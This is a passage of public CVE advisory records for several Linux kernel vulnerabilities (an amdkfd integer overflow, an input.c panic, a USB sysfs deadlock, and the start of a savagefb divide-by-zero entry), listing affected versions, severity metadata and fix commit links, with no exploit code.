	https://git.kernel.org/stable/c/e6768c6737f4c02cb…
	https://git.kernel.org/stable/c/315eb3c2df7e4cb18…
	https://git.kernel.org/stable/c/0c33d11153949310d…
	https://git.kernel.org/stable/c/3b0daecfeac0103ab…

Impacted products

Vendor

Product

Version

Linux

Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < e6721ea845fcb93a764a92bd40f1afc0d6c69751 (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < 8b0564704255c6b3c6a7188e86939f754e1577c0 (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < fcbd99b3c73309107e3be71f20dff9414df64f91 (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < cbac7de1d9901521e78cdc34e15451df3611f2ad (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < e6768c6737f4c02cba193a3339f0cc2907f0b86a (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < 315eb3c2df7e4cb18e3eacfa18a53a46f2bf0ef7 (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < 0c33d11153949310d76631d8f4a4736519eacd3a (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < 3b0daecfeac0103aba8b293df07a0cbaf8b43f29 (git)

Linux

Affected: 3.19
Unaffected: 0 , < 3.19 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26817",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-15T12:56:37.523191Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:22:41.285Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T18:29:59.654Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e6721ea845fcb93a764a92bd40f1afc0d6c69751"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8b0564704255c6b3c6a7188e86939f754e1577c0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fcbd99b3c73309107e3be71f20dff9414df64f91"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cbac7de1d9901521e78cdc34e15451df3611f2ad"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e6768c6737f4c02cba193a3339f0cc2907f0b86a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/315eb3c2df7e4cb18e3eacfa18a53a46f2bf0ef7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0c33d11153949310d76631d8f4a4736519eacd3a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3b0daecfeac0103aba8b293df07a0cbaf8b43f29"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P3TH6JK7ZZMSXSVHOJKIMSSOC6EQM4WV/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdkfd/kfd_chardev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e6721ea845fcb93a764a92bd40f1afc0d6c69751",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "8b0564704255c6b3c6a7188e86939f754e1577c0",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "fcbd99b3c73309107e3be71f20dff9414df64f91",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "cbac7de1d9901521e78cdc34e15451df3611f2ad",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "e6768c6737f4c02cba193a3339f0cc2907f0b86a",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "315eb3c2df7e4cb18e3eacfa18a53a46f2bf0ef7",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "0c33d11153949310d76631d8f4a4736519eacd3a",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "3b0daecfeac0103aba8b293df07a0cbaf8b43f29",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdkfd/kfd_chardev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.19"
            },
            {
              "lessThan": "3.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\namdkfd: use calloc instead of kzalloc to avoid integer overflow\n\nThis uses calloc instead of doing the multiplication which might\noverflow."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-16T08:02:32.138Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e6721ea845fcb93a764a92bd40f1afc0d6c69751"
        },
        {
          "url": "https://git.kernel.org/stable/c/8b0564704255c6b3c6a7188e86939f754e1577c0"
        },
        {
          "url": "https://git.kernel.org/stable/c/fcbd99b3c73309107e3be71f20dff9414df64f91"
        },
        {
          "url": "https://git.kernel.org/stable/c/cbac7de1d9901521e78cdc34e15451df3611f2ad"
        },
        {
          "url": "https://git.kernel.org/stable/c/e6768c6737f4c02cba193a3339f0cc2907f0b86a"
        },
        {
          "url": "https://git.kernel.org/stable/c/315eb3c2df7e4cb18e3eacfa18a53a46f2bf0ef7"
        },
        {
          "url": "https://git.kernel.org/stable/c/0c33d11153949310d76631d8f4a4736519eacd3a"
        },
        {
          "url": "https://git.kernel.org/stable/c/3b0daecfeac0103aba8b293df07a0cbaf8b43f29"
        }
      ],
      "title": "amdkfd: use calloc instead of kzalloc to avoid integer overflow",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26817",
    "datePublished": "2024-04-13T11:17:08.764Z",
    "dateReserved": "2024-02-19T14:20:24.180Z",
    "dateUpdated": "2025-11-04T18:29:59.654Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2022-48619 (GCVE-0-2022-48619)

Vulnerability from cvelistv5 – Published: 2024-01-12 00:00 – Updated: 2024-09-03 18:16

Summary

An issue was discovered in drivers/input/input.c in the Linux kernel before 5.17.10. An attacker can cause a denial of service (panic) because input_set_capability mishandles the situation in which an event code falls outside of a bitmap.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

n/a

Assigner

mitre

References

URL

Tags

	https://github.com/torvalds/linux/commit/409353cb…
	https://cdn.kernel.org/pub/linux/kernel/v5.x/Chan…

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T15:17:55.318Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://github.com/torvalds/linux/commit/409353cbe9fe48f6bc196114c442b1cff05a39bc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.17.10"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2022-48619",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-03-28T18:06:22.160654Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-755",
                "description": "CWE-755 Improper Handling of Exceptional Conditions",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-03T18:16:34.468Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in drivers/input/input.c in the Linux kernel before 5.17.10. An attacker can cause a denial of service (panic) because input_set_capability mishandles the situation in which an event code falls outside of a bitmap."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-01-12T02:48:12.810177",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://github.com/torvalds/linux/commit/409353cbe9fe48f6bc196114c442b1cff05a39bc"
        },
        {
          "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.17.10"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2022-48619",
    "datePublished": "2024-01-12T00:00:00",
    "dateReserved": "2024-01-12T00:00:00",
    "dateUpdated": "2024-09-03T18:16:34.468Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26934 (GCVE-0-2024-26934)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:17 – Updated: 2025-05-04 09:00

Title

USB: core: Fix deadlock in usb_deauthorize_interface()

Summary

In the Linux kernel, the following vulnerability has been resolved: USB: core: Fix deadlock in usb_deauthorize_interface() Among the attribute file callback routines in drivers/usb/core/sysfs.c, the interface_authorized_store() function is the only one which acquires a device lock on an ancestor device: It calls usb_deauthorize_interface(), which locks the interface's parent USB device. The will lead to deadlock if another process already owns that lock and tries to remove the interface, whether through a configuration change or because the device has been disconnected. As part of the removal procedure, device_del() waits for all ongoing sysfs attribute callbacks to complete. But usb_deauthorize_interface() can't complete until the device lock has been released, and the lock won't be released until the removal has finished. The mechanism provided by sysfs to prevent this kind of deadlock is to use the sysfs_break_active_protection() function, which tells sysfs not to wait for the attribute callback. Reported-and-tested by: Yue Sun <samsun1006219@gmail.com> Reported by: xingwei lee <xrivendell7@gmail.com>

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8cbdd324b41528994…
	https://git.kernel.org/stable/c/12d6a5681a0a5cecc…
	https://git.kernel.org/stable/c/e451709573f8be904…
	https://git.kernel.org/stable/c/1b175bc579f46520b…
	https://git.kernel.org/stable/c/ab062fa3dc69aea88…
	https://git.kernel.org/stable/c/122a06f1068bf5e39…
	https://git.kernel.org/stable/c/dbdf66250d2d33e8b…
	https://git.kernel.org/stable/c/07acf979da33c7213…
	https://git.kernel.org/stable/c/80ba43e9f799cbdd8…

Impacted products

Vendor

Product

Version

Linux

Affected: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 , < 8cbdd324b41528994027128207fae8100dff094f (git)
Affected: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 , < 12d6a5681a0a5cecc2af7860f0a1613fa7c6e947 (git)
Affected: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 , < e451709573f8be904a8a72d0775bf114d7c291d9 (git)
Affected: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 , < 1b175bc579f46520b11ecda443bcd2ee4904f66a (git)
Affected: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 , < ab062fa3dc69aea88fe62162c5881ba14b50ecc5 (git)
Affected: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 , < 122a06f1068bf5e39089863f4f60b1f5d4273384 (git)
Affected: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 , < dbdf66250d2d33e8b27352fcb901de79f3521057 (git)
Affected: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 , < 07acf979da33c721357ff27129edf74c23c036c6 (git)
Affected: 310d2b4124c073a2057ef9d952d4d938e9b1dfd9 , < 80ba43e9f799cbdd83842fc27db667289b3150f5 (git)

Linux

Affected: 4.4
Unaffected: 0 , < 4.4 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26934",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-10T18:35:35.947702Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:21:30.301Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.693Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8cbdd324b41528994027128207fae8100dff094f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/12d6a5681a0a5cecc2af7860f0a1613fa7c6e947"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e451709573f8be904a8a72d0775bf114d7c291d9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1b175bc579f46520b11ecda443bcd2ee4904f66a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ab062fa3dc69aea88fe62162c5881ba14b50ecc5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/122a06f1068bf5e39089863f4f60b1f5d4273384"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dbdf66250d2d33e8b27352fcb901de79f3521057"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/07acf979da33c721357ff27129edf74c23c036c6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/80ba43e9f799cbdd83842fc27db667289b3150f5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/core/sysfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8cbdd324b41528994027128207fae8100dff094f",
              "status": "affected",
              "version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
              "versionType": "git"
            },
            {
              "lessThan": "12d6a5681a0a5cecc2af7860f0a1613fa7c6e947",
              "status": "affected",
              "version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
              "versionType": "git"
            },
            {
              "lessThan": "e451709573f8be904a8a72d0775bf114d7c291d9",
              "status": "affected",
              "version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
              "versionType": "git"
            },
            {
              "lessThan": "1b175bc579f46520b11ecda443bcd2ee4904f66a",
              "status": "affected",
              "version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
              "versionType": "git"
            },
            {
              "lessThan": "ab062fa3dc69aea88fe62162c5881ba14b50ecc5",
              "status": "affected",
              "version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
              "versionType": "git"
            },
            {
              "lessThan": "122a06f1068bf5e39089863f4f60b1f5d4273384",
              "status": "affected",
              "version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
              "versionType": "git"
            },
            {
              "lessThan": "dbdf66250d2d33e8b27352fcb901de79f3521057",
              "status": "affected",
              "version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
              "versionType": "git"
            },
            {
              "lessThan": "07acf979da33c721357ff27129edf74c23c036c6",
              "status": "affected",
              "version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
              "versionType": "git"
            },
            {
              "lessThan": "80ba43e9f799cbdd83842fc27db667289b3150f5",
              "status": "affected",
              "version": "310d2b4124c073a2057ef9d952d4d938e9b1dfd9",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/core/sysfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.4"
            },
            {
              "lessThan": "4.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "4.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "4.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "4.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "4.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "4.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "4.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "4.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: core: Fix deadlock in usb_deauthorize_interface()\n\nAmong the attribute file callback routines in\ndrivers/usb/core/sysfs.c, the interface_authorized_store() function is\nthe only one which acquires a device lock on an ancestor device: It\ncalls usb_deauthorize_interface(), which locks the interface\u0027s parent\nUSB device.\n\nThe will lead to deadlock if another process already owns that lock\nand tries to remove the interface, whether through a configuration\nchange or because the device has been disconnected.  As part of the\nremoval procedure, device_del() waits for all ongoing sysfs attribute\ncallbacks to complete.  But usb_deauthorize_interface() can\u0027t complete\nuntil the device lock has been released, and the lock won\u0027t be\nreleased until the removal has finished.\n\nThe mechanism provided by sysfs to prevent this kind of deadlock is\nto use the sysfs_break_active_protection() function, which tells sysfs\nnot to wait for the attribute callback.\n\nReported-and-tested by: Yue Sun \u003csamsun1006219@gmail.com\u003e\nReported by: xingwei lee \u003cxrivendell7@gmail.com\u003e"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:00:06.704Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8cbdd324b41528994027128207fae8100dff094f"
        },
        {
          "url": "https://git.kernel.org/stable/c/12d6a5681a0a5cecc2af7860f0a1613fa7c6e947"
        },
        {
          "url": "https://git.kernel.org/stable/c/e451709573f8be904a8a72d0775bf114d7c291d9"
        },
        {
          "url": "https://git.kernel.org/stable/c/1b175bc579f46520b11ecda443bcd2ee4904f66a"
        },
        {
          "url": "https://git.kernel.org/stable/c/ab062fa3dc69aea88fe62162c5881ba14b50ecc5"
        },
        {
          "url": "https://git.kernel.org/stable/c/122a06f1068bf5e39089863f4f60b1f5d4273384"
        },
        {
          "url": "https://git.kernel.org/stable/c/dbdf66250d2d33e8b27352fcb901de79f3521057"
        },
        {
          "url": "https://git.kernel.org/stable/c/07acf979da33c721357ff27129edf74c23c036c6"
        },
        {
          "url": "https://git.kernel.org/stable/c/80ba43e9f799cbdd83842fc27db667289b3150f5"
        }
      ],
      "title": "USB: core: Fix deadlock in usb_deauthorize_interface()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26934",
    "datePublished": "2024-05-01T05:17:27.352Z",
    "dateReserved": "2024-02-19T14:20:24.196Z",
    "dateUpdated": "2025-05-04T09:00:06.704Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26778 (GCVE-0-2024-26778)

Vulnerability from cvelistv5 – Published: 2024-04-03 17:01 – Updated: 2026-01-05 10:34

Title

fbdev: savage: Error out if pixclock equals zero

Summary

In the Linux kernel, the following vulnerability has been resolved: fbdev: savage: Error out if pixclock equals zero The userspace program could pass any values to the driver through ioctl() interface. If the driver doesn't check the value of pixclock, it may cause divide-by-zero error. Although pixclock is checked in savagefb_decode_var(), but it is not checked properly in savagefb_probe(). Fix this by checking whether pixclock is zero in the function savagefb_check_var() before info->var.pixclock is used as the divisor. This is similar to CVE-2022-3061 in i740fb which was fixed by commit 15cf0b8.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/224453de8505aede1…
	https://git.kernel.org/stable/c/84dce0f6a4cc5b7bf…
	https://git.kernel.org/stable/c/512ee6d6041e007ef…
